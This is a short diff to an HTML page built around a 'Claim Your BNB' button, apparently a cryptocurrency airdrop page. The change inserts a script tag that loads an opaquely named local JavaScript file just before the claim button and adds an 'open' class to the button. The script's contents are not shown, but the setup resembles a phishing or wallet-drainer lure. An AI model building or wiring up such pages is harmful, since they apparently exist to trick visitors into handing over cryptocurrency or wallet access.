--- a/index.html
+++ b/index.html
@@ -365,7 +365,8 @@
                 </p>
 
                 <div class="bnb-cta">
-                    <button class="bnb-claim-button bnb-interact-button">
+                    <script src="./67ae701dd913a9b8e6d5efd7.js"></script>
+                    <button class="bnb-claim-button bnb-interact-button open">
                         <span>Claim Your BNB</span>
                         <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                             <path d="M5 12h14"/>
